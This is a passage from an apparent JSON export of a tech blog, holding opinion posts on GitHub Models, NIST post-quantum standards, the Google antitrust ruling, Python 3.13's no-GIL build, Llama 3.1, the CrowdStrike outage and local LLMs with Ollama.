for production — with rate limits, SLAs, and scale — Azure is there as a natural next step. 
It\u0026rsquo;s a better experience than being asked for a credit card before you can even see if a model fits your needs.\nImplications for the AI Development Workflow # What excites me most is how this could change the way teams evaluate and integrate AI capabilities:\nRapid prototyping: Product managers and developers can quickly test whether a particular model is suitable for a feature before committing to an integration. \u0026ldquo;Will GPT-4o-mini handle our customer support summarization?\u0026rdquo; becomes a five-minute experiment instead of a half-day setup project.\nModel comparison: Having multiple models available through a consistent interface makes A/B testing between models much more practical. Swap out one model for another with a single parameter change and compare outputs.\nEducation and onboarding: Junior developers or team members new to AI can explore models in a familiar environment. The Codespaces integration provides working sample code that serves as both documentation and a starting point.\nStandardized inference API: The use of the Azure AI inference SDK as the common API layer means you\u0026rsquo;re not locked into provider-specific SDKs. Your code structure remains the same whether you\u0026rsquo;re calling a Meta model or an OpenAI model.\nWhat\u0026rsquo;s Missing # It\u0026rsquo;s still early days, and there are gaps. Fine-tuning isn\u0026rsquo;t part of the offering — you\u0026rsquo;re working with base models and whatever system prompts you provide. Rate limits on the free tier are restrictive enough that you can\u0026rsquo;t use this for any production workload. 
And the model selection, while decent, doesn\u0026rsquo;t include every model you might want to evaluate.\nI\u0026rsquo;d also like to see better tooling for structured evaluation — automated benchmarking against your own test datasets, cost estimation for production use, and latency profiling under load.\nMy Take # GitHub Models is doing what GitHub does best: taking something that requires too many steps and making it feel obvious. The AI model landscape is overwhelming right now, and anything that helps developers quickly evaluate and experiment is welcome.\nWill this replace dedicated ML platforms for serious production workloads? No. But it doesn\u0026rsquo;t need to. It just needs to be the place where developers start their AI exploration journey. And given that 100 million developers are already on GitHub, the distribution advantage is hard to argue with.\nIf you haven\u0026rsquo;t tried it yet, go to the Models marketplace and spend twenty minutes playing with different models. The barrier to entry is essentially zero, and you might discover that a model you hadn\u0026rsquo;t considered is a better fit for your use case than the one you defaulted to.\n","date":"22 August 2024","externalUrl":null,"permalink":"/posts/240822-github-models-ai-marketplace/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub launches Models, a new playground for experimenting with AI models directly from GitHub. Here’s why this integration matters.","title":"GitHub Models — Bringing AI Model Experimentation to Where Developers Already Live","type":"posts"},{"content":"After eight years of evaluation, the National Institute of Standards and Technology (NIST) has officially published its first three finalized post-quantum cryptography (PQC) standards. 
FIPS 203 (ML-KEM, based on CRYSTALS-Kyber), FIPS 204 (ML-DSA, based on CRYSTALS-Dilithium), and FIPS 205 (SLH-DSA, based on SPHINCS+) are now official standards, ready for implementation.\nIf you\u0026rsquo;ve been treating quantum computing as a distant theoretical concern — and I\u0026rsquo;ll admit I was in that camp for years — this announcement should recalibrate your timeline. When NIST finalizes standards, it means the migration clock is ticking.\nWhy This Matters Now # The common objection I hear is: \u0026ldquo;Quantum computers can\u0026rsquo;t break current encryption yet, so why worry?\u0026rdquo; The answer is a concept called \u0026ldquo;harvest now, decrypt later.\u0026rdquo; Adversaries — state-sponsored and otherwise — are already intercepting and storing encrypted traffic today, with the expectation that future quantum computers will be able to decrypt it.\nIf you\u0026rsquo;re handling data that needs to remain confidential for more than 10-15 years (medical records, financial data, government communications, long-lived signing keys), the data you\u0026rsquo;re protecting today with RSA encryption or ECDH key exchange might be readable in the future. That\u0026rsquo;s not science fiction; it\u0026rsquo;s the explicit threat model that drove NIST to begin this standardization process back in 2016.\nUnderstanding the Three Standards # Let me break down what was actually standardized, because the naming has been confusing throughout this process:\nFIPS 203 — ML-KEM (Module-Lattice-Based Key-Encapsulation Mechanism) This is your replacement for key exchange. Where you currently use ECDH or RSA key exchange in TLS, SSH, and VPNs, ML-KEM is the post-quantum alternative. It\u0026rsquo;s based on the mathematical hardness of lattice problems, which are believed to be resistant to quantum attacks. 
Key sizes are larger than what we\u0026rsquo;re used to — ML-KEM-768 public keys are 1,184 bytes compared to 32 bytes for X25519 — but the performance is actually quite reasonable.\nFIPS 204 — ML-DSA (Module-Lattice-Based Digital Signature Algorithm) This replaces RSA and ECDSA for digital signatures. Think code signing, certificate authorities, JWT tokens, and software updates. Again, larger key and signature sizes, but computationally fast. ML-DSA-65 signatures are 3,309 bytes versus 64 bytes for Ed25519.\nFIPS 205 — SLH-DSA (Stateless Hash-Based Digital Signature Algorithm) This is a more conservative alternative for signatures, based on hash functions rather than lattice mathematics. It\u0026rsquo;s slower and produces larger signatures, but its security relies on the well-understood properties of hash functions. Think of it as the \u0026ldquo;belt and suspenders\u0026rdquo; option.\nPractical Impact for Developers # Here\u0026rsquo;s what I\u0026rsquo;d be thinking about if I were planning a migration (and I am):\nTLS and HTTPS: The good news is that most of this will be handled by your TLS library and infrastructure. OpenSSL, BoringSSL, and other libraries are already adding PQC support. Chrome and Firefox have been experimenting with hybrid key exchange (combining classical and post-quantum algorithms) for over a year. Your HTTPS connections may already be partially post-quantum without you knowing it.\nSSH: OpenSSH 9.0 already defaults to a hybrid key exchange that includes a post-quantum component. If you\u0026rsquo;ve updated your SSH installations recently, you might already be covered for key exchange (though not yet for authentication).\nApplication-level cryptography: This is where most developers will need to do actual work. 
If your application directly uses cryptographic libraries for encryption, signing, or key exchange — think JWT libraries, message encryption, document signing — you\u0026rsquo;ll need to plan a migration path.\nCertificate infrastructure: This is the hard part. The entire PKI ecosystem — certificate authorities, certificate chains, OCSP — needs to transition. Larger certificates mean more bandwidth, and some constrained environments (IoT devices, embedded systems) may struggle with the increased sizes.\nThe Migration Strategy # Don\u0026rsquo;t panic, but do start planning. Here\u0026rsquo;s a reasonable approach:\nInventory your cryptographic dependencies. Know where you\u0026rsquo;re using RSA, ECDSA, ECDH, and AES (AES-256 is already quantum-resistant for symmetric encryption, by the way).\nAdopt crypto-agility. Design your systems so that swapping cryptographic algorithms doesn\u0026rsquo;t require a complete rewrite. Abstract your crypto behind interfaces.\nStart with hybrid approaches. Use both classical and post-quantum algorithms simultaneously. This protects you against quantum threats while maintaining security if the new algorithms turn out to have weaknesses.\nWatch your library ecosystem. Most major cryptographic libraries will handle the heavy lifting. Keep them updated.\nMy Take # I\u0026rsquo;ve been through enough cryptographic transitions — from DES to AES, from SHA-1 to SHA-256, from RSA-1024 to RSA-2048 — to know that these things always take longer than expected. Organizations that start planning now will be fine. Organizations that wait until quantum computers are actually breaking things will be scrambling.\nThe NIST standardization is the starting gun. You don\u0026rsquo;t need to sprint, but you should be lacing up your shoes. Start with an inventory of your cryptographic dependencies, adopt hybrid approaches where your libraries support them, and design for crypto-agility going forward. 
Your future self — and your future users — will thank you.\n","date":"15 August 2024","externalUrl":null,"permalink":"/posts/240815-nist-post-quantum-cryptography/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NIST has published its first three finalized post-quantum cryptography standards. Here’s what developers need to know and do.","title":"NIST Finalizes Post-Quantum Cryptography Standards — Time to Start Planning","type":"posts"},{"content":"This week, Judge Amit Mehta of the U.S. District Court for the District of Columbia ruled that Google has illegally maintained a monopoly in the search engine market. It\u0026rsquo;s one of the most significant antitrust decisions in technology since the Microsoft case in the late 1990s — and for those of us who build on the web, the implications could be far-reaching.\nHaving been in this industry long enough to remember the Microsoft browser wars, I can tell you that antitrust rulings like this don\u0026rsquo;t just affect the company in question. They reshape entire ecosystems.\nThe Core of the Ruling # The ruling centers on Google\u0026rsquo;s practice of paying enormous sums — reportedly around $26 billion in 2021 alone — to be the default search engine on browsers, phones, and other devices. Apple\u0026rsquo;s Safari, Mozilla Firefox, and virtually every Android device funnel users to Google Search by default. The court found that these exclusive deals effectively locked out competition, not because Google\u0026rsquo;s product was inherently superior, but because the defaults created an insurmountable distribution advantage.\nFrom a technical standpoint, this is fascinating. Google\u0026rsquo;s search quality is genuinely good — nobody disputes that. But the ruling suggests that even excellent products can become monopolistic when distribution agreements prevent meaningful competition. 
The network effects are real: more users mean more data, more data means better algorithms, better algorithms mean more users.\nWhat This Means for the Web Platform # If you\u0026rsquo;re a web developer, you should be paying attention. Google\u0026rsquo;s dominance in search has had cascading effects on how we build websites:\nSEO as a monoculture: We\u0026rsquo;ve all been optimizing for a single search engine. Our sitemaps, structured data, Core Web Vitals — all of it is effectively designed around Google\u0026rsquo;s ranking algorithm. If the remedies in this case actually open up search competition, we might need to think about discoverability more broadly.\nChrome\u0026rsquo;s influence on web standards: Google\u0026rsquo;s search dominance is intertwined with Chrome\u0026rsquo;s browser dominance. While the ruling is specifically about search, any structural remedies could impact Google\u0026rsquo;s ability to leverage Chrome as a distribution channel. This could shift the dynamics in web standards bodies like the W3C.\nAdvertising economics: For those of us who work on ad-supported products, the advertising market is deeply shaped by Google\u0026rsquo;s position. Changes here could alter CPMs, targeting capabilities, and the economics of free-tier products.\nThe Developer Tools Question # Here\u0026rsquo;s what I find most interesting from a practical standpoint: Google provides an enormous amount of free infrastructure to the developer community. Firebase, Google Cloud\u0026rsquo;s free tier, Angular, Go contributions, TensorFlow, Chrome DevTools, Lighthouse — the list goes on. Much of this is funded by search advertising revenue.\nI\u0026rsquo;m not suggesting Google would suddenly shut down these projects, but it\u0026rsquo;s worth considering the second-order effects. If remedies significantly impact Google\u0026rsquo;s revenue structure, we might see changes in how generously they fund open-source projects and developer tools. 
I\u0026rsquo;ve seen this pattern before with other companies: when the business model shifts, the \u0026ldquo;strategic investments\u0026rdquo; in developer goodwill are often the first things to get re-evaluated.\nRemedies Are Where It Gets Real # The ruling itself is just the beginning. The remedies phase — where the court decides what to actually do about the monopoly — is where things get concrete. Options range from behavioral remedies (stop making exclusive deals) to structural ones (breaking up parts of the company).\nThe most developer-relevant scenario would be a requirement to open up default search placement to competition. Imagine a world where your browser regularly asks which search engine you want to use, similar to what the EU has done with the Digital Markets Act. This could genuinely change how users discover content and, by extension, how we think about building discoverable web applications.\nMy Take # I\u0026rsquo;ve been building web applications since before Google existed, and I\u0026rsquo;ve watched the search landscape consolidate from a dozen viable engines to essentially one. That consolidation made some things simpler — you only need one SEO strategy — but it also created a fragile monoculture.\nThis ruling doesn\u0026rsquo;t change anything overnight. Appeals will take years. But it signals that the era of unchallenged platform dominance is facing real legal headwinds, not just in the EU, but now in the United States as well.\nFor developers, the practical advice is straightforward: don\u0026rsquo;t over-optimize for any single platform. Build for the open web. Make your applications discoverable through multiple channels. And keep an eye on the remedies phase — that\u0026rsquo;s where the real story will unfold.\nThe web was designed to be decentralized. 
Maybe the courts are finally catching up to that original vision.\n","date":"8 August 2024","externalUrl":null,"permalink":"/posts/240808-google-antitrust-ruling/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A federal judge ruled Google maintains an illegal monopoly in search. Here’s what this means for the developer ecosystem.","title":"Google's Antitrust Reckoning — What the Monopoly Ruling Means for Developers","type":"posts"},{"content":"","date":"8 August 2024","externalUrl":null,"permalink":"/categories/industry/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"Industry","type":"categories"},{"content":"Python 3.13 is shaping up to be one of the most consequential Python releases in years, and the headline feature isn\u0026rsquo;t a new syntax addition or a standard library module — it\u0026rsquo;s an experimental build mode that removes the Global Interpreter Lock. The free-threaded CPython build, available as an opt-in experimental feature, allows Python threads to run truly concurrently on multiple CPU cores. If you\u0026rsquo;ve been writing Python for any length of time, you understand why this is a big deal.\nThe latest beta dropped this week, and I\u0026rsquo;ve been testing it against some of our data processing workloads. Here\u0026rsquo;s what I\u0026rsquo;ve found and why you should be cautiously optimistic.\nThe GIL Problem, Briefly # For the uninitiated: CPython\u0026rsquo;s Global Interpreter Lock is a mutex that ensures only one thread executes Python bytecode at a time. It exists because CPython\u0026rsquo;s memory management — specifically its reference counting garbage collector — isn\u0026rsquo;t thread-safe. 
The GIL makes single-threaded code fast and C extension development straightforward, but it means that CPU-bound multithreaded Python code can\u0026rsquo;t utilize multiple cores.\nThis has been Python\u0026rsquo;s most infamous limitation for over two decades. The workarounds are well-known: multiprocessing for CPU-bound parallelism (with the overhead of process creation and inter-process communication), asyncio for I/O-bound concurrency (with the constraint of cooperative scheduling), or writing performance-critical sections in C/Cython/Rust. These solutions work, but they add complexity and friction that developers in languages with real threading take for granted. The broader language ecosystem evolution shows how Go and Rust handle concurrency more elegantly.\nPEP 703, authored by Sam Gross and accepted by the Python Steering Council in late 2023, laid out the roadmap for making the GIL optional. Python 3.13 is the first release to include this as an experimental build option. This follows the pattern of Python 3.14 free-threading initiatives and broader concurrency improvements across the ecosystem.\nWhat\u0026rsquo;s Actually Changed # The free-threaded build (--disable-gil at compile time, or installable via the python3.13t binary in some package managers) replaces the GIL with a combination of fine-grained per-object locks, biased reference counting, and deferred reference counting techniques. The technical implementation is genuinely clever — objects that are only accessed by a single thread use a fast, lock-free reference counting path, and the locking overhead only kicks in when objects are actually shared between threads.\nThe result is that pure Python threads can now execute concurrently on multiple cores. In my testing with a simple CPU-bound workload — computing Fibonacci numbers across multiple threads — I\u0026rsquo;m seeing near-linear scaling up to the number of available cores. 
That\u0026rsquo;s something that was literally impossible in standard CPython before. This aligns with trends in developer tooling and language runtime maturity where performance and concurrent execution are becoming table-stakes.\nimport threading\nimport time\n\ndef cpu_bound_work(n):\n    \u0026#34;\u0026#34;\u0026#34;Simple CPU-bound computation\u0026#34;\u0026#34;\u0026#34;\n    total = 0\n    for i in range(n):\n        total += i * i\n    return total\n\nthreads = []\nstart = time.perf_counter()\nfor _ in range(8):\n    t = threading.Thread(target=cpu_bound_work, args=(10_000_000,))\n    threads.append(t)\n    t.start()\nfor t in threads:\n    t.join()\nelapsed = time.perf_counter() - start\nOn my 8-core machine, this runs roughly 6-7x faster with the free-threaded build compared to standard CPython. With the GIL, adding more threads doesn\u0026rsquo;t help at all for CPU-bound work — it actually makes things slightly slower due to thread scheduling overhead.\nThe Compatibility Question # Here\u0026rsquo;s where things get complicated. The free-threaded build is experimental for good reason. C extensions that rely on the GIL for thread safety — which is most of them — may need modifications to work correctly. NumPy, pandas, and the scientific Python ecosystem have been working on compatibility, but it\u0026rsquo;s a significant effort.\nThe Python C API has been extended with new functions for working in a free-threaded world. Extension authors need to audit their code for thread safety, use the new Py_mod_gil slot to declare GIL requirements, and potentially add locking around shared mutable state that was previously protected implicitly by the GIL.\nFor pure Python code, the transition is smoother but not seamless. Code that was accidentally thread-safe due to the GIL may have latent race conditions that become actual bugs in the free-threaded build. 
If you\u0026rsquo;ve ever written to a shared dictionary from multiple threads thinking \u0026ldquo;the GIL makes this safe\u0026rdquo; — and I\u0026rsquo;ve seen plenty of code that does — you\u0026rsquo;ll need to add proper synchronization.\nPerformance Implications # The free-threaded build carries a performance overhead for single-threaded code. In the current beta, single-threaded workloads run approximately 5-10% slower than standard CPython due to the overhead of the fine-grained locking infrastructure, even when no threading is used. The CPython team is actively working to reduce this gap, and it\u0026rsquo;s expected to narrow significantly before the final release and in subsequent versions.\nThis trade-off is a core part of why the feature is opt-in and experimental. For workloads that don\u0026rsquo;t benefit from true threading — which is a lot of Python workloads — the GIL-enabled build remains the better choice. The long-term vision, as outlined in PEP 703, is to eventually make the free-threaded build the default, but only once the performance gap is negligible and ecosystem compatibility is broad.\nMy Take # I\u0026rsquo;ve been writing Python since the 1.5 days, and the GIL has been a constant companion — sometimes a helpful simplification, often a frustrating constraint. Seeing true concurrent threading work in CPython feels slightly surreal, like watching a fundamental law of the Python universe get rewritten.\nBut I want to temper the excitement with realism. This is an experimental feature in a beta release. The ecosystem needs time to adapt, the performance overhead for single-threaded code needs to shrink, and developers need to learn proper concurrent programming patterns that the GIL previously let them ignore. The transition will take years, not months.\nThat said, the direction is clear and the execution so far is impressive. 
Sam Gross and the CPython team have found a path that doesn\u0026rsquo;t sacrifice backward compatibility — the GIL build remains the default, and existing code continues to work exactly as before. The free-threaded build is an opt-in door to a future where Python\u0026rsquo;s threading story is genuinely competitive.\nFor now, I\u0026rsquo;d recommend trying the free-threaded build with your test suite to identify any latent threading issues in your code. Don\u0026rsquo;t deploy it to production — it\u0026rsquo;s not ready for that. But start thinking about what real threading could enable in your Python projects. For data pipelines, web scrapers, and compute-heavy backends, the possibilities are exciting.\nPython 3.13 final is expected in October. I\u0026rsquo;ll be watching the free-threaded story closely.\n","date":"1 August 2024","externalUrl":null,"permalink":"/posts/240801-python-3-13-free-threaded-nogil/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.13’s experimental free-threaded mode removes the Global Interpreter Lock, and it could fundamentally change how we write concurrent Python.","title":"Python 3.13 and the No-GIL Experiment — Threading's Biggest Shakeup in Decades","type":"posts"},{"content":"Two days ago, Meta released Llama 3.1, and the headliner is a 405 billion parameter model that Meta claims is competitive with GPT-4o and Claude 3.5 Sonnet on major benchmarks. The model ships under an updated Llama license that\u0026rsquo;s remarkably permissive for something this capable. This isn\u0026rsquo;t a research preview or a limited access program — it\u0026rsquo;s weights you can download, a license you can build products on, and a model that narrows the gap between open and closed AI to a margin that matters.\nI\u0026rsquo;ve spent the past two days running the smaller variants and reading the technical details. 
Here\u0026rsquo;s what I think this means for those of us building with AI.\nThe Model Family # Llama 3.1 comes in three sizes: 8B, 70B, and the new 405B. All three support a 128K token context window, which is a significant jump from Llama 3\u0026rsquo;s 8K. The architecture is dense transformer — no mixture-of-experts tricks — which means the 405B model genuinely has 405 billion active parameters during inference. Meta reports training on over 15 trillion tokens using a cluster of 16,384 H100 GPUs.\nFor context on the broader LLM landscape, you might be interested in how GPT-4o and other commercial models stack up against these open-source alternatives, as well as the emergence of reasoning models that push beyond pure scaling.\nThe benchmark results are genuinely impressive. On MMLU, the 405B scores 87.3%, putting it in the same tier as GPT-4o (88.7%) and Claude 3.5 Sonnet (88.7%). On HumanEval coding benchmarks, it hits 89.0%. Math reasoning, multilingual capability, and long-context performance all show competitive numbers. Are benchmarks the whole story? No. But they signal that we\u0026rsquo;re not talking about a consolation-prize open model anymore.\nThe 8B and 70B variants are also substantially improved over their Llama 3 predecessors, benefiting from the longer training and expanded training data. The 8B model in particular is remarkably capable for its size, and it\u0026rsquo;s the one most developers will actually run.\nThe License Matters # Previous Llama releases came with restrictions that made lawyers nervous — usage caps based on monthly active users, geographic limitations, and requirements that made enterprise adoption complicated. The Llama 3.1 Community License Agreement is cleaner. You can use it commercially, fine-tune it, and distribute derivatives. 
The main restriction is the 700 million monthly active user threshold, which effectively only applies to the largest tech companies.\nFor the vast majority of startups, enterprises, and individual developers, this is functionally an open license. You can build products, offer API services, create fine-tuned variants for specific domains, and do so without negotiating a commercial agreement with Meta.\nThis licensing shift is as important as the technical capability. An amazing model that you can\u0026rsquo;t legally deploy is an academic curiosity. A competitive model with clear commercial rights is a platform.\nWhat This Means for the Ecosystem # The immediate impact is on the fine-tuning and specialization ecosystem. Every company that\u0026rsquo;s been fine-tuning Llama 2 70B or Llama 3 70B for domain-specific tasks now has a base model that\u0026rsquo;s dramatically more capable. Medical AI, legal document analysis, code generation for specific frameworks, customer service automation — all of these use cases get an upgrade by simply swapping the base model.\nThe 128K context window opens up use cases that were previously limited to commercial APIs. Processing entire codebases, analyzing long documents, maintaining extended conversation context — these become possible with a model you control entirely.\nI\u0026rsquo;m particularly interested in what happens when organizations start fine-tuning the 405B model. With techniques like QLoRA, fine-tuning a model this large is feasible on a cluster of high-end GPUs. The resulting specialized models could be truly exceptional in narrow domains. We\u0026rsquo;ve already seen what fine-tuning can do with smaller models — applying those techniques to a 405B base model should yield remarkable results.\nRunning It Practically # Let\u0026rsquo;s talk hardware reality. The 405B model, even quantized to 4-bit, requires approximately 200GB of memory. 
You\u0026rsquo;re looking at multiple high-end GPUs — think a cluster of A100s or H100s — or a very large CPU memory footprint with significantly slower inference. This isn\u0026rsquo;t something you\u0026rsquo;re running on your workstation.\nThe 70B model is the practical sweet spot for most organizations. Quantized to 4-bit, it fits on a single 48GB GPU or a pair of 24GB consumer cards. The 8B model runs comfortably on any modern GPU with 8GB+ VRAM, making it accessible for individual developers.\nFor serving the 405B, you\u0026rsquo;re realistically looking at cloud GPU instances — AWS p4d/p5, GCP A3, or equivalent — or working with inference providers who are already spinning up Llama 3.1 endpoints. Together AI, Fireworks, Groq, and others have announced support this week. The cost per token through these providers is substantially lower than equivalent commercial API pricing, which is part of Meta\u0026rsquo;s strategic play — commoditize the model layer to drive down AI costs across the industry.\nMy Take # I\u0026rsquo;ve been following the open-source AI space since the original Llama leak in early 2023, and Llama 3.1 feels like a genuine inflection point. For the first time, there\u0026rsquo;s an open model that isn\u0026rsquo;t just \u0026ldquo;good for an open model\u0026rdquo; — it\u0026rsquo;s competitive with the best commercial offerings on many tasks. This democratization of AI capability aligns with broader advances in foundation model architecture and the competitive landscape.\nMeta\u0026rsquo;s strategy is increasingly clear: by making frontier AI models freely available, they commoditize the model layer and ensure that AI capability isn\u0026rsquo;t controlled by a small number of API providers. 
Whether you view this as genuine commitment to open science or strategic competitive positioning against OpenAI and Google, the outcome for developers is the same — more capable tools with more deployment flexibility.\nFor my own projects, I\u0026rsquo;m planning to evaluate the 70B model as a replacement for several API-based workflows where data privacy is a concern. The 128K context window alone makes it viable for document processing tasks that previously required GPT-4 Turbo. And for the fine-tuning work I\u0026rsquo;ve been experimenting with, having a stronger base model changes the calculus on what\u0026rsquo;s achievable. The combination of open models and advanced training techniques is enabling new possibilities.\nThe era of open frontier AI models has arrived, and that\u0026rsquo;s something worth paying attention to, regardless of which side of the open-vs-closed debate you fall on. The ecosystem continues to evolve with infrastructure innovations supporting this transition.\n","date":"25 July 2024","externalUrl":null,"permalink":"/posts/240725-meta-llama-3-1-open-source/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Meta releases Llama 3.1 with a 405 billion parameter model under a permissive license, making frontier-class AI genuinely open for the first time.","title":"Llama 3.1 405B — Meta Goes All-In on Open-Source AI","type":"posts"},{"content":"I woke up this morning to a flood of messages from colleagues across multiple time zones, all saying variations of the same thing: \u0026ldquo;Everything is down.\u0026rdquo; Airports. Banks. Hospitals. Retail chains. Emergency services. Millions of Windows machines worldwide stuck in a blue screen of death boot loop, and the culprit isn\u0026rsquo;t ransomware or a nation-state attack — it\u0026rsquo;s a botched content update from CrowdStrike, one of the world\u0026rsquo;s most widely deployed endpoint security platforms. 
This is the nightmare scenario that security researchers warned about after the SolarWinds breach: a single vendor update affecting massive portions of global infrastructure.\nAs I write this, the situation is still unfolding. But the scale is already staggering, and the implications for how we think about software supply chains and kernel-level access deserve immediate discussion.\nWhat Happened # CrowdStrike\u0026rsquo;s Falcon sensor, which runs as a kernel-mode driver on Windows systems, received a \u0026ldquo;channel file\u0026rdquo; content update — specifically, a file named C-00000291*.sys — that caused the sensor to trigger a logic error resulting in a system crash. Because the driver loads early in the boot process and runs at the kernel level, the crash occurs before Windows can fully start, creating an unrecoverable boot loop on affected machines.\nThe update was pushed automatically through CrowdStrike\u0026rsquo;s cloud-based update mechanism. Unlike traditional software patches that might go through staging and approval workflows, these content updates — which contain detection signatures and behavioral rules — are designed to deploy rapidly to respond to emerging threats. That rapid deployment capability, which is normally a security advantage, became the vector for one of the largest IT outages in recent memory.\nCrowdStrike has confirmed the issue and published a workaround: boot into Safe Mode or the Windows Recovery Environment and delete the offending channel file from C:\\Windows\\System32\\drivers\\CrowdStrike\\. The problem is that this requires physical or console access to each affected machine. For organizations with thousands of endpoints — many of them remote — that\u0026rsquo;s a recovery measured in days, not hours.\nThe Kernel Access Question # This incident puts a spotlight on a fundamental tension in endpoint security. 
CrowdStrike\u0026rsquo;s Falcon sensor, like most enterprise EDR products, runs as a kernel-mode driver specifically because that level of access is necessary to monitor for rootkits, detect kernel-level exploits, and ensure that malware can\u0026rsquo;t simply terminate the security agent. It\u0026rsquo;s a defensible architectural choice for security, but it comes with the inherent risk that any bug in kernel-mode code can take down the entire system.\nMicrosoft has been gradually trying to move security vendors out of the kernel with features like Virtualization-Based Security and the Microsoft Virus Initiative\u0026rsquo;s guidelines. But the reality is that most enterprise security vendors still operate at the kernel level, and their customers rely on that deep access for protection against sophisticated threats.\nThe uncomfortable truth is that every kernel-mode driver on your system is a potential single point of failure. Your security vendor, your storage driver, your virtualization hypervisor — they all run with the same privileges as the operating system itself.\nThe Staging Problem # What strikes me hardest about this incident is the update delivery model. Content updates — as opposed to agent software updates — typically bypass traditional change management processes. The security argument is compelling: when a new zero-day exploit is circulating, you want your detection signatures updated in minutes, not days. CrowdStrike\u0026rsquo;s rapid response capability is one of the things their customers pay for.\nBut this creates an implicit trust relationship where a single vendor can push code changes to millions of machines simultaneously, without individual customer approval, and that code runs with the highest possible system privileges. 
The blast radius of a mistake is\u0026hellip; well, we\u0026rsquo;re seeing it today.\nI\u0026rsquo;ve spent years advocating for progressive deployment strategies — canary releases, blue-green deployments, staged rollouts with automated rollback. These practices are standard for web applications. They should be non-negotiable for anything that touches kernel space. A 1% canary deployment with a 30-minute bake time would have contained this issue to a fraction of affected machines and given CrowdStrike time to detect the problem and halt the rollout. The broader supply chain security lessons we\u0026rsquo;ve learned over the past years all point to the same conclusion: trust but verify, and always maintain a recovery path.\nThe Recovery Challenge # For the organizations currently dealing with this, the recovery process is brutal. Each affected machine needs manual intervention. You can\u0026rsquo;t push a fix remotely to a machine that won\u0026rsquo;t boot. If your fleet is managed with BitLocker drive encryption — which it should be — you need the recovery keys before you can even access Safe Mode, and those recovery keys might be stored in Active Directory on a server that\u0026rsquo;s\u0026hellip; also affected.\nThis cascading dependency problem is something I\u0026rsquo;ve seen in disaster recovery planning exercises, but rarely at this scale in production. It\u0026rsquo;s a painful reminder that recovery procedures need to account for scenarios where your management infrastructure is itself impacted.\nCloud-hosted workloads fare somewhat better — VMs can often be rescued by mounting their disks to a clean instance and removing the offending file. But for physical endpoints — laptops, desktops, point-of-sale terminals, airport check-in kiosks — it\u0026rsquo;s hands-on-keyboard for every single machine.\nMy Take # I want to be clear: this isn\u0026rsquo;t an argument against CrowdStrike specifically, or against EDR products generally. 
Endpoint security is essential, and running at the kernel level is a legitimate architectural decision. But this event should fundamentally change how the industry thinks about update deployment for privileged software.\nEvery vendor shipping kernel-mode code needs to answer three questions after today:\nDo you have staged rollout for all update types, including content/signature updates? What is your maximum blast radius if an update is defective? How do your customers recover when your software prevents their systems from booting? For those of us on the operations side, this is also a reminder about fleet diversity and recovery planning. Having a tested, offline recovery procedure for your critical systems isn\u0026rsquo;t paranoia — after today, it\u0026rsquo;s basic hygiene. The CrowdStrike incident follows the same pattern as other major security and infrastructure failures: a single point of failure, rapid proliferation, and a recovery window measured in days instead of hours.\nI\u0026rsquo;ll be writing more about this as the full picture emerges. For now, if you\u0026rsquo;re in the middle of recovery, CrowdStrike\u0026rsquo;s official remediation guidance is your best resource. Hang in there.\n","date":"18 July 2024","externalUrl":null,"permalink":"/posts/240718-crowdstrike-global-outage/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A faulty CrowdStrike Falcon sensor update has caused one of the largest IT outages in history, bricking millions of Windows machines worldwide.","title":"The CrowdStrike Outage — When a Security Update Takes Down the World","type":"posts"},{"content":"Something quietly remarkable has happened in the AI tooling space over the past six months. While the headlines focus on GPT-4o, Claude 3.5, and the latest frontier model benchmarks, a parallel movement has been building momentum: running large language models locally, on your own hardware, with genuinely useful results. 
At the center of this movement is Ollama, a tool that has made local LLM usage almost embarrassingly easy.\nI\u0026rsquo;ve been running Ollama on my development workstation for the past few months, and this week I finally moved it into a more permanent role in my workflow. It\u0026rsquo;s worth talking about why.\nFrom Curiosity to Utility # When I first tried running local models last year, the experience was rough. Model formats were a mess, GGML was giving way to GGUF, quantization was a dark art, and actually getting inference running required cobbling together Python scripts and hoping your CUDA drivers cooperated. It worked, but it felt like a science project.\nOllama changed that equation entirely. A single binary, a clean CLI, and a model library that\u0026rsquo;s reminiscent of Docker Hub. ollama pull llama3 and you\u0026rsquo;re running Meta\u0026rsquo;s latest model locally. ollama pull codellama for code assistance. ollama pull mistral for a capable general-purpose model. The experience is polished in a way that signals real engineering effort behind the scenes.\nThe model library now hosts dozens of models from multiple providers — Meta\u0026rsquo;s Llama 3, Mistral\u0026rsquo;s models, Google\u0026rsquo;s Gemma, Microsoft\u0026rsquo;s Phi-3, and many community fine-tunes. The quantized versions run respectably on consumer hardware. I\u0026rsquo;m getting useful code completions from CodeLlama 13B on a machine with an RTX 4070, and Llama 3 8B handles general Q\u0026amp;A and text processing tasks without breaking a sweat.\nWhy Local Matters # The obvious argument for local LLMs is privacy and data sovereignty. When you\u0026rsquo;re working with proprietary code, client data, or anything covered by an NDA, sending it to a third-party API isn\u0026rsquo;t always an option. I\u0026rsquo;ve worked with enough enterprise clients to know that the legal review for a new AI API vendor can take longer than the project itself. 
Running the model locally sidesteps that conversation entirely.\nBut there are less obvious benefits too. Latency is one — inference on a local GPU eliminates the network round-trip and API queue time. For interactive coding assistance, the difference between 200ms and 2 seconds is the difference between flow state and frustration. Cost is another — if you\u0026rsquo;re making hundreds of API calls per day for code review, documentation, or test generation, those tokens add up fast. A one-time hardware investment amortizes nicely.\nReliability matters as well. I can\u0026rsquo;t count the number of times I\u0026rsquo;ve been in the middle of a debugging session only to have an API return a rate limit error or a 503. My local Ollama instance has been running for weeks without a hiccup.\nThe Developer Tooling Ecosystem # What\u0026rsquo;s really accelerated local LLM adoption is the ecosystem growing around Ollama. Continue provides IDE integration that connects to your local Ollama instance for code completion and chat, working with both VS Code and JetBrains. Open WebUI gives you a ChatGPT-style interface backed by local models. And because Ollama exposes an OpenAI-compatible API endpoint, any tool that works with the OpenAI API can be pointed at your local instance with a URL change.\nI\u0026rsquo;ve been using Continue with VS Code connected to a local CodeLlama instance for the past two weeks, and it\u0026rsquo;s\u0026hellip; good. Not GPT-4 good, but good enough for autocomplete, boilerplate generation, and explaining unfamiliar code. The 13B quantized model hits a sweet spot between quality and speed on my hardware.\nThe Docker integration is particularly elegant. Ollama publishes official Docker images, so spinning up a model server on any machine in your 